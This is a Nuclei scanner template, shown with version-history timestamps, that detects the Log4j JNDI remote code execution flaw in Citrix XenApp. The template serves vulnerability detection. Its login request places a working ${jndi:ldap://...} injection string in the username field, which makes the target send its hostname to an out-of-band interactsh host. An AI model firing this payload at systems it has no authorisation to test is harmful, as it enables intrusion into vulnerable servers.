nuclei-templates/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml

68 lines
2.5 KiB
YAML
Raw Normal View History

2023-10-18 20:00:15 +00:00
id: citrix-xenapp-log4j-rce
info:
name: Citrix XenApp - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author: shaikhyaser
2023-10-18 20:00:15 +00:00
severity: critical
description: |
Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system.
reference:
- https://support.citrix.com/article/CTX335705
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
2024-09-10 08:22:50 +00:00
cpe: cpe:2.3:a:citrix:xenapp:*:*:*:*:*:*:*:*
2023-10-18 20:00:15 +00:00
metadata:
max-request: 1
shodan-query: html:"/citrix/xenapp"
2024-09-10 08:22:50 +00:00
product: xenapp
vendor: citrix
2023-10-18 20:00:15 +00:00
tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str: "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http:
- raw:
- |
POST /Citrix/XenApp/auth/login.aspx HTTP/1.1
Host: {{Hostname}}
Cookie: WIClientInfo="clientConnSecure#false";
Origin: {{RootURL}}
Referer: {{RootURL}}/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected
Content-Type: application/x-www-form-urlencoded
2023-10-19 07:28:29 +00:00
LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
2023-10-18 20:00:15 +00:00
matchers-condition: and
matchers:
- type: word
2023-11-09 09:14:13 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
2023-10-18 20:00:15 +00:00
words:
- "dns"
- type: regex
part: interactsh_request
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
extractors:
- type: kval
kval:
2023-11-09 09:14:13 +00:00
- interactsh_ip # Print remote interaction IP in output
2023-10-18 20:00:15 +00:00
- type: regex
group: 2
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
2023-10-18 20:00:15 +00:00
part: interactsh_request
- type: regex
group: 1
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
part: interactsh_request
2024-09-12 05:14:01 +00:00
# digest: 490a00463044022068ceac19233ab39be81be3fb238ffdfda82679bcf6f1eb76bf7e86d136143d36022069782813f8b2d37998fdec533d58fed844e42dce6d29472e38b8a8091c975427:922c64590222798bb761d5b6d8e72950